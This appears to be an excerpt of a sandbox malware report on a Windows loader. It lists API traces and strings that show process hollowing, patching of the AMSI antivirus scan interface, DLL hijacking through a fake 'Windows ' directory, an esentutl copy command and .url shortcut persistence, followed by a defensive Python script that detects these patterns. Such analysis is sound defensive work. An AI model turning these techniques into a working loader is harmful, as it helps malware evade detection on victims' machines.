                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0303B7E0,0303B824,OpenSession,02F47380,02EEB7B8,UacScan,02F47380), ref: 02EE86E9
                                                                                                                • ResumeThread.KERNEL32(00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8), ref: 02EE8D33
                                                                                                                • CloseHandle.KERNEL32(00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380), ref: 02EE8EB2
                                                                                                                  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02F47380,02EEB7B8,UacInitialize,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380), ref: 02EE92A4
                                                                                                                  • Part of subcall function 02EC7E5C: GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
                                                                                                                  • Part of subcall function 02EDDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDD5E), ref: 02EDDCCB
                                                                                                                  • Part of subcall function 02EDDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EDDD05
                                                                                                                  • Part of subcall function 02EDDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02EDDD32
                                                                                                                  • Part of subcall function 02EDDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02EDDD3B
                                                                                                                  • Part of subcall function 02ED8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02ED83C2), ref: 02ED83A4
                                                                                                                • ExitProcess.KERNEL32(00000000,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,Initialize,02F47380,02EEB7B8,00000000,00000000,00000000,ScanString,02F47380,02EEB7B8), ref: 02EEB2FA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                • API String ID: 2769005614-3738268246
                                                                                                                • Opcode ID: 2ef9e99eeab4afd7884e8506bfb4c4fa7dae704a9dcfc0d2f0db787685e7f4ef
                                                                                                                • Instruction ID: fea7be8752867c75eb92c521099f37816e0974721bacb4c48d84c3f1212c6c3a
                                                                                                                • Opcode Fuzzy Hash: 2ef9e99eeab4afd7884e8506bfb4c4fa7dae704a9dcfc0d2f0db787685e7f4ef
                                                                                                                • Instruction Fuzzy Hash: 27430D39A8411D8BCB11FBA4DD919CE73FAFB85304F60E1A9F4099B654DA30AE52CF41
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02EDDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDD5E), ref: 02EDDCCB
                                                                                                                  • Part of subcall function 02EDDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EDDD05
                                                                                                                  • Part of subcall function 02EDDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02EDDD32
                                                                                                                  • Part of subcall function 02EDDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02EDDD3B
                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,02EEBB30,00000000,00000000,02EEBB24,00000000,00000000), ref: 02EE40CB
                                                                                                                  • Part of subcall function 02ED88B8: LoadLibraryW.KERNEL32(amsi), ref: 02ED88C1
                                                                                                                  • Part of subcall function 02ED88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02ED8920
                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,000003E8,ScanBuffer,02F47380,02EEB7B8,UacScan,02F47380), ref: 02EE4277
                                                                                                                  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                • Sleep.KERNEL32(00004E20,UacScan,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacInitialize,02F47380,02EEB7B8), ref: 02EE50EE
                                                                                                                  • Part of subcall function 02EDDC04: RtlI.N(?,?,00000000,02EDDC7E), ref: 02EDDC2C
                                                                                                                  • Part of subcall function 02EDDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC42
                                                                                                                  • Part of subcall function 02EDDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02EDDC7E), ref: 02EDDC61
                                                                                                                  • Part of subcall function 02EC7E5C: GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
                                                                                                                  • Part of subcall function 02ED85BC: WinExec.KERNEL32(?,?), ref: 02ED8624
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                • API String ID: 2171786310-3926298568
                                                                                                                • Opcode ID: c1d8e770f5ed3054a47ed7f6b066b1e9969a9151c54fc4ed4843f2c0cb44f558
                                                                                                                • Instruction ID: e5b776b8a6ca40f9110cfdbdd66cda61f2756d50c13c2934cb640b85c606ee82
                                                                                                                • Opcode Fuzzy Hash: c1d8e770f5ed3054a47ed7f6b066b1e9969a9151c54fc4ed4843f2c0cb44f558
                                                                                                                • Instruction Fuzzy Hash: 5B434C34B8015D8BDB11FBA4DD91ACE73FAFB85304F60A1A9B409A7654DB30AE52CF41
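The two function records above carry the evidence behind the report's "process hollowing" and "DLL search order hijacking via additional space in path" signatures: in the first, CreateProcessAsUserW is called with dwCreationFlags 00000004 (CREATE_SUSPENDED) at 02EE86E9 and ResumeThread follows at 02EE8D33, with FlushInstructionCache in a subcall; in the second, the String ID field holds a mock `C:\\Windows \\SysWOW64\\` directory (note the space after `Windows`), an `esentutl.exe /y` copy command, `.url` / `[InternetShortcut]` / `URL=file:` fields, and `lld.SLITUTEN`, which is `NETUTILS.dll` written backwards. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines and a String ID field in the exact format printed on this page and flags those patterns. The sample inputs are copied from the two records above; the regexes, the dwCreationFlags positions (taken from the documented Win32 CreateProcess* signatures) and the output keys are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox 'APIs' / 'String ID' listings (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied from the first function record above.
APIS_HOLLOW = """\
• Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0303B7E0,0303B824,OpenSession,02F47380,02EEB7B8,UacScan,02F47380), ref: 02EE86E9
• ResumeThread.KERNEL32(00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8), ref: 02EE8D33
• CloseHandle.KERNEL32(00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,00000000,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380), ref: 02EE8EB2
• Part of subcall function 02ED8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02ED83C2), ref: 02ED83A4
"""
# Constructed input: the String ID field of the second function record above.
STRING_ID_LOADER = r'/d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN'

# One "• Name.Module(args), ref: ADDR" line, optionally prefixed with
# "Part of subcall function XXXX:" as Joe Sandbox prints inlined callees.
API_RE = re.compile(
    r"(?:Part of subcall function ([0-9A-F]+):\s*)?(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-F]+)"
)
CREATE_SUSPENDED = 0x00000004
# Zero-based position of dwCreationFlags in the Win32 signatures (assumption
# of this example; Joe Sandbox prints at most 16 positional arguments).
FLAG_INDEX = {
    "CreateProcessA": 5, "CreateProcessW": 5,
    "CreateProcessAsUserA": 6, "CreateProcessAsUserW": 6,
    "CreateProcessWithLogonW": 6,
}
RESUMERS = {"ResumeThread", "NtResumeThread", "NtAlertResumeThread"}
# "C:\Windows \System32" style mock directory: a space before the separator.
MOCK_DIR_RE = re.compile(r"[A-Za-z]:\\{1,2}Windows \\{1,2}", re.IGNORECASE)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str]


def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        sub, name, module, argstr, ref = m.groups()
        args = [a.strip() for a in argstr.split(",")] if argstr else []
        calls.append(ApiCall(name, module, args, ref, sub))
    return calls


def as_hex(arg: str) -> Optional[int]:
    """Numeric arguments are printed as uppercase hex; '?', string literals
    and symbol names are left as None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{1,8}", arg) else None


def find_suspended_spawns(calls: list) -> list:
    """Pairs (create_call, resume_call_or_None) for every CreateProcess* whose
    dwCreationFlags has CREATE_SUSPENDED set; a later resume completes the
    hollowing pattern (spawn suspended, overwrite the image, then run it)."""
    hits = []
    for i, c in enumerate(calls):
        idx = FLAG_INDEX.get(c.name)
        if idx is None or idx >= len(c.args):
            continue
        flags = as_hex(c.args[idx])
        if flags is None or not flags & CREATE_SUSPENDED:
            continue
        resume = next((r for r in calls[i + 1:] if r.name in RESUMERS), None)
        hits.append((c, resume))
    return hits


def triage(api_text: str, string_id: str) -> dict:
    calls = parse_api_lines(api_text)
    spawns = find_suspended_spawns(calls)
    strings = string_id.split("$")
    return {
        "process_hollowing": any(r is not None for _, r in spawns),
        "suspended_spawn_refs": [(c.name, c.ref, r.ref if r else None) for c, r in spawns],
        "flush_icache": any(c.name == "FlushInstructionCache" for c in calls),
        "mock_trusted_dirs": sorted({s for s in strings if MOCK_DIR_RE.search(s)}),
        "url_shortcut_persistence": ".url" in strings and "[InternetShortcut]" in strings
            and any(s.startswith("URL=file:") for s in strings),
        "esentutl_copy": any("esentutl.exe /y" in s.lower() for s in strings),
        # Strings that spell a DLL name backwards, e.g. lld.SLITUTEN -> NETUTILS.dll.
        "reversed_dll_names": [s[::-1] for s in strings
                               if re.fullmatch(r"[\w.-]+\.dll", s[::-1], re.IGNORECASE)],
    }


if __name__ == "__main__":
    for key, value in triage(APIS_HOLLOW, STRING_ID_LOADER).items():
        print(f"{key}: {value}")
```

Feed it the concatenated APIs sections of a report and each record's String ID field to get a per-function verdict. A CreateProcess* call whose flags come from a register is printed as `?` and is deliberately not counted; the only positive evidence accepted is an explicit CREATE_SUSPENDED followed by a resume.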

                                                                                                                 Control-flow Graph
                                                                                                                 (rendered as an image in the report; the node list and the Executed / Not Executed colouring are omitted here. Block 2ede688-2edec81 calls subroutine 2ed8788, which wraps CreateProcessAsUserW, and block 2edec87-2edeedd contains the WaitForSingleObject and CloseHandle calls listed under APIs below.)
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02ED8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02ED8814
                                                                                                                  • Part of subcall function 02ED894C: LoadLibraryW.KERNEL32(bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize,02F473A8,02EDA93C,UacScan), ref: 02ED8960
                                                                                                                  • Part of subcall function 02ED894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02ED897A
                                                                                                                  • Part of subcall function 02ED894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000888,00000000,02F473A8,02EDA587,ScanString,02F473A8,02EDA93C,ScanBuffer,02F473A8,02EDA93C,Initialize), ref: 02ED89B6
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02F47380,02EDEF4C,OpenSession,02F47380,02EDEF4C,UacScan,02F47380,02EDEF4C,ScanBuffer,02F47380,02EDEF4C,OpenSession,02F47380), ref: 02EDED6E
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02F47380,02EDEF4C,OpenSession,02F47380,02EDEF4C,UacScan,02F47380,02EDEF4C,ScanBuffer,02F47380,02EDEF4C,OpenSession), ref: 02EDED76
                                                                                                                • CloseHandle.KERNEL32(00000864,00000000,00000000,000000FF,ScanString,02F47380,02EDEF4C,OpenSession,02F47380,02EDEF4C,UacScan,02F47380,02EDEF4C,ScanBuffer,02F47380,02EDEF4C), ref: 02EDED7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                • String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                • API String ID: 3475578485-1053911981
                                                                                                                • Opcode ID: 5ea7d1b948e73e430725608a67042cc61d12fbc0de2e4824d718af0c2920eeb8
                                                                                                                • Instruction ID: 0808f57ca3db7e028a4ad054fd677513370a7c8887bba9b9908f8809aeaddf27
                                                                                                                • Opcode Fuzzy Hash: 5ea7d1b948e73e430725608a67042cc61d12fbc0de2e4824d718af0c2920eeb8
                                                                                                                • Instruction Fuzzy Hash: 7822F234A801599FEB11FBA4D995BCE73B7AF85300F24E0A9B004AB294DB309E57CF55

                                                                                                                 Control-flow Graph
                                                                                                                 (rendered as an image in the report; the node list and the Executed / Not Executed colouring are omitted here. Block 2ec1684-2ec16ad calls VirtualAlloc, and six short blocks between 2ec17cb and 2ec1964 call Sleep, two of which are listed under APIs below.)
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000,?,02EC1FC1), ref: 02EC17D0
                                                                                                                • Sleep.KERNEL32(0000000A,00000000,?,02EC1FC1), ref: 02EC17E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 72f845ee6885ba6686e1b64296ff33e682340f76da776bbd631376c183fd1830
                                                                                                                • Instruction ID: df984f6583e635668cd7fbb5440f72d7f06dcc5e215125cf8faa9d8f9fe16e79
                                                                                                                • Opcode Fuzzy Hash: 72f845ee6885ba6686e1b64296ff33e682340f76da776bbd631376c183fd1830
                                                                                                                • Instruction Fuzzy Hash: 98B1337AA846448BCB15CFA8D680755FBE1FB86354F29C66DE40D8F386C7B09463CB90

                                                                                                                Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02ED88C1
  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02ED8920
Strings
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 941070894-2671292670
• Opcode ID: b5ba6880b89dce1bb84d7b64bd527b59954dcc853ffe9686957180cd0398a8a8
• Instruction ID: 759bf6d26a8569122d11b24379fb43aac80323a313511d4873eccdcc46d5eb78
• Opcode Fuzzy Hash: b5ba6880b89dce1bb84d7b64bd527b59954dcc853ffe9686957180cd0398a8a8
• Instruction Fuzzy Hash: 50F0445058C381B9D301E3B48C45F4BBECD4BA2264F44DA5DB1E85A2D2D675D1078767

Control-flow Graph

control_flow_graph 13227 2ec1a8c-2ec1a9b 13228 2ec1b6c-2ec1b6f 13227->13228 13229 2ec1aa1-2ec1aa5 13227->13229 13230 2ec1c5c-2ec1c60 13228->13230 13231 2ec1b75-2ec1b7f 13228->13231 13232 2ec1b08-2ec1b11 13229->13232 13233 2ec1aa7-2ec1aae 13229->13233 13238 2ec16e8-2ec170b call 2ec1644 VirtualFree 13230->13238 13239 2ec1c66-2ec1c6b 13230->13239 13234 2ec1b3c-2ec1b49 13231->13234 13235 2ec1b81-2ec1b8d 13231->13235 13232->13233 13240 2ec1b13-2ec1b27 Sleep 13232->13240 13236 2ec1adc-2ec1ade 13233->13236 13237 2ec1ab0-2ec1abb 13233->13237 13234->13235 13241 2ec1b4b-2ec1b5f Sleep 13234->13241 13242 2ec1b8f-2ec1b92 13235->13242 13243 2ec1bc4-2ec1bd2 13235->13243 13246 2ec1ae0-2ec1af1 13236->13246 13247 2ec1af3 13236->13247 13244 2ec1abd-2ec1ac2 13237->13244 13245 2ec1ac4-2ec1ad9 13237->13245 13255 2ec170d-2ec1714 13238->13255 13256 2ec1716 13238->13256 13240->13233 13249 2ec1b2d-2ec1b38 Sleep 13240->13249 13241->13235 13251 2ec1b61-2ec1b68 Sleep 13241->13251 13252 2ec1b96-2ec1b9a 13242->13252 13243->13252 13254 2ec1bd4-2ec1bd9 call 2ec14c0 13243->13254 13246->13247 13253 2ec1af6-2ec1b03 13246->13253 13247->13253 13249->13232 13251->13234 13257 2ec1bdc-2ec1be9 13252->13257 13258 2ec1b9c-2ec1ba2 13252->13258 13253->13231 13254->13252 13261 2ec1719-2ec1723 13255->13261 13256->13261 13257->13258 13260 2ec1beb-2ec1bf2 call 2ec14c0 13257->13260 13262 2ec1bf4-2ec1bfe 13258->13262 13263 2ec1ba4-2ec1bc2 call 2ec1500 13258->13263 13260->13258 13266 2ec1c2c-2ec1c59 call 2ec1560 13262->13266 13267 2ec1c00-2ec1c28 VirtualFree 13262->13267
APIs
• Sleep.KERNEL32(00000000,?,?,00000000,02EC1FE4), ref: 02EC1B17
• Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02EC1FE4), ref: 02EC1B31
Memory Dump Source
• Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
• Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 0d8fdefe66f1622d3e261237b4690b746705db85cd72a2237586a7114325b8ad
• Instruction ID: e8049de8ae92ae197f9d2cf4edb37e231ac310ba7d6c8234018d4142f4472486
• Opcode Fuzzy Hash: 0d8fdefe66f1622d3e261237b4690b746705db85cd72a2237586a7114325b8ad
• Instruction Fuzzy Hash: 5651BF756802408FDB15CFA88A94756BBE0AB46318F28D5AEE44C8F287D7B4D447CB91

Control-flow Graph

APIs
